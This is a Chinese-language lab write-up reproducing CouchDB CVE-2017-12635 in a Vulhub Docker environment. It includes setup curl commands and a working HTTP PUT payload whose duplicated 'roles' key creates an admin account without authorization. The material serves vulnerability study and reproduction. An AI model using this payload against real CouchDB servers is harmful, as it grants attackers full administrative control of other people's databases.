# Apache CouchDB 垂直权限绕过漏洞 CVE-2017-12635 ## 漏洞描述 Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞。 参考链接: - http://bobao.360.cn/learning/detail/4716.html - https://justi.cz/security/2017/11/14/couchdb-rce-npm.html ## 漏洞影响 ``` Couchdb 小于 1.7.0 以及 小于 2.1.1 ``` ## 环境搭建 Vulhub编译及启动环境: ``` docker-compose build docker-compose up -d ``` 环境启动后,访问`http://your-ip:5984/_utils/`即可看到一个web页面,说明Couchdb已成功启动。但我们不知道密码,无法登陆。 ## 漏洞复现 访问`http://your-ip:5984/_users/org.couchdb.user:vulhub`,如果出现404错误:`{"error":"not_found","reason":"Database does not exist."}`,则说明当前Couchdb的初始化未完成,数据库不存在,需要手动进行配置。 Vulhub目录下存在init.sh文件: ``` ┌──(root💀kali)-[/home/…/vulnerability/vulhub/couchdb/CVE-2017-12635] └─# cat init.sh #!/bin/bash COUCHDB_URL=${COUCHDB_URL:-"couchdb:5984"} COUCHDB_AUTH=${COUCHDB_AUTH:-"admin:password"} while ! curl -m 5 "${COUCHDB_URL}"; do sleep 1 done curl -X PUT http://${COUCHDB_AUTH}@${COUCHDB_URL}/_users curl -X PUT http://${COUCHDB_AUTH}@${COUCHDB_URL}/_replicator curl -X PUT http://${COUCHDB_AUTH}@${COUCHDB_URL}/_global_changes ``` 依次执行命令,初始化Couchdb,新建`_users`、`_replicator`、`_glocal_changes`三个数据库: ``` curl -X PUT http://admin:password@192.168.174.128:5984/_users curl -X PUT http://admin:password@192.168.174.128:5984/_replicator curl -X PUT http://admin:password@192.168.174.128:5984/_global_changes ``` ![image-20220222100506110](images/202202221005221.png) 配置完成后,发送如下数据包: ``` PUT /_users/org.couchdb.user:vulhub HTTP/1.1 Host: your-ip:5984 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/json Content-Length: 90 { "type": "user", "name": "vulhub", "roles": ["_admin"], "password": "vulhub" } ``` ![image-20220222100650526](images/202202221006605.png) 可见,返回403错误:`{"error":"forbidden","reason":"Only _admin may set roles"}`,只有管理员才能设置Role角色 发送包含两个roles的数据包,即可绕过限制: ``` PUT /_users/org.couchdb.user:vulhub HTTP/1.1 Host: your-ip:5984 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/json Content-Length: 108 { "type": "user", "name": "vulhub", "roles": ["_admin"], "roles": [], "password": "vulhub" } ``` 成功创建管理员,账户密码均为`vulhub`: ![image-20220222100732534](images/202202221007617.png) 再次访问`http://your-ip:5984/_utils/`,输入账户密码`vulhub`,可以成功登录: ![image-20220222100904867](images/202202221009954.png)